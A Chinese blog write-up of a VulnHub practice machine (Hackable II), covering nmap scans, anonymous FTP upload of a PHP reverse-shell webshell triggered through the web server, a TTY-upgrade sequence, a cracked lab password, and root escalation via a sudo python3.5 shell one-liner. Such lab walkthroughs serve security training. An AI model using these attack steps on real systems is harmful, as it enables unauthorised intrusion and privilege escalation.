靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权

最新推荐文章于 2024-05-04 13:56:08 发布
最新推荐文章于 2024-05-04 13:56:08 发布
阅读量2.7k 收藏 4
点赞数 1
分类专栏: 靶机学习 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122964886
版权

靶机练习 No.24 Vulnhub靶机hackableII

0x00 环境安装

  • 下载地址

       https://www.vulnhub.com/entry/hackable-ii,711/

  • 名称: hacksudo系列HackDudo

  • 靶场: VulnHub.com

  • 难度: 简单

  • 发布时间: 2021年3月16日

  • 提示信息: 无

  • 目标: 2个flag

  • 环境搭建
    Virtual Box 启动 网卡 配置与kali 同网卡

0x01 信息收集

步骤一:ip探测

nmap -sP 192.168.56.0/24

在这里插入图片描述
192.168.56.115 锁定为

步骤二:端口服务识别

nmap -sC -sV -A -p- 192.168.56.115 -o port.txt

在这里插入图片描述
从nmap 扫描结果看出
21 ftp 可以匿名访问
22 ssh
80 http apache 2.4.18

0x02 漏洞挖掘

思路一:ftp 匿名访问

思路二:80 http服务挖掘

手工+扫描器+目录+源码+功能点

思路三:ssh爆破

测试中收集到的密码 用于爆破

步骤一:ftp匿名访问(成功)

(1) 匿名登录

 ftp 192.168.56.115
 anonymous
 回车
 回车
 ls
 get CALL.html

只有一个CALL.html文件 下载下来看看
在这里插入图片描述

(2)查看内容

在这里插入图片描述
一个html页面内容 先放过

步骤二:80http探测

(1)访问首页

apache 配置页面
在这里插入图片描述

(2)查看源码 有没有隐藏信息

发现提示目录扫描
在这里插入图片描述

(3)目录扫描

python3 dirsearch.py  -u "http://192.168.56.115" -e "*"

在这里插入图片描述

(4)查看files页面

又发现 CALL.html页面
在这里插入图片描述
说明此处为 ftp登录后 的地方
回头看看ftp 是否可以写入文件 可以的话 可以上传马 getshell

步骤三:ftp上传马

(1)查看ftp是否拥有写权限

在这里插入图片描述

(2)上传 kali自带的php反弹shell的马

cd /usr/share/webshells/php/
vim /usr/share/webshells/php/php-reverse-shell.php

修改ip 为靶机可以访问到的 kali ip
在这里插入图片描述
在这里插入图片描述

(3)kali开启监听,并运行马 在这里插入图片描述

网页访问文件
在这里插入图片描述

(4)反弹shell(成功)

只有www-data权限
在这里插入图片描述

步骤四:切换为完整终端(成功)

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty -a
stty raw -echo;fg
reset

在这里插入图片描述

步骤五:www-data 权限信息收集

(1)cat /etc/passwd

在这里插入图片描述

(2)/home目录下信息收集

/home 目录下存在 important.txt文件 有 读权限
读取 提示 运行 /.runme.sh 脚本
运行后
显示 密钥被破坏了
重启电脑在3秒后
重启电脑在2秒后
重启电脑在1秒后
在这里插入图片描述
密钥解密 得
onion
在这里插入图片描述

(3)/home/shrek 目录下信息收集

大多没有读权限
在这里插入图片描述

步骤六:ssh登录shrek用户(登录成功)

(1)尝试用收集到的密码登录shrek用户(成功)

在这里插入图片描述

(2)查看user.txt

在这里插入图片描述

0x03 提权

3.1 sudo 查看

(1)sudo -l

在这里插入图片描述
(root)NOPASSWD: /usr/bin/python3.5
发现 python3.5

(2)python3.5 提权(成功)

sudo python3.5 -c 'import os;os.system("/bin/sh")'

在这里插入图片描述

(3)查看root.txt

在这里插入图片描述

0x04 总结

(1)nmap 扫出 ftp匿名访问 anonymous登录成功存在读写权限

(2)目录扫描扫出files目录 发现也是ftp登陆后的目录。

(3)ftp 上传kali的php 反弹shell马,网页运行。

(4)反弹shell成功后,收集到一处MD5解密,解密出onion。

(5)ssh登录shrek用户成功。

(6)sudo -l 发现 不用密码就可以以root权限执行 python3.5

(7)sudo python3.5 -c 'import os;os.system("/bin/sh")'切换root终端成功.

LuckyCharm~
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
靶机渗透练习89-IA:Nemesis (1.0.1)
hirak0的博客
05-01 3365
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1030
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
网络安全-反弹shell详解(攻击,检测与防御)_反弹shell原理及防御方法(2)
最新发布
2401_82645688的博客
05-04 483
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1009
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1607
Vulnhub-CTF5靶机实战
vulnhub靶场渗透系列-- AI:Web:2
lza20001103的博客
10-01 2578
vulnhub靶场渗透系列-- AI:Web:2
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4582
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1666
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
Cloud AV靶机渗透过程
捣蛋鬼
03-26 2531
背景:云防病毒扫描服务,测试阶段 目标:渗透该服务,找到漏洞并提权 难易程度:简单(思路和技巧) 攻击方法:端口扫描 web侦察 SQL注入 命令注入 密码爆破 代码分析 NC串联 本地提权 0x01 主机发现:sudo arp-scan -l 倾向于黑客工具 arping 更多系统适用 使用for循环--for i in $(seq 1 254); do sudo arping -c 1 2.2.2.$i;done 0x02 使用nmap全端口扫描:sudo nmap -p-...
Vulnhub靶场之symfonos:1
SoporAeternus12的博客
04-16 3366
靶场的下载地址: 信息收集 nmap -sP 192.168.157.145/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09:45 EDT Nmap scan report for 192.168.157.2 Host is up (0.00055s latency). Nmap scan report for 192.168.157.158 Host is up (0.00016s latency). Nmap scan repor
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权
xnxqwzy的博客
07-29 3152
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
靶机练习Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2298
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1050
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 & smb & 端口敲门 & RIPS & tomcat & linux 提权
冬萍子癸水
04-25 1181
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap PORT STATE SERVICE REASON VERSION 22/tcp filtered ssh port-unreach...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值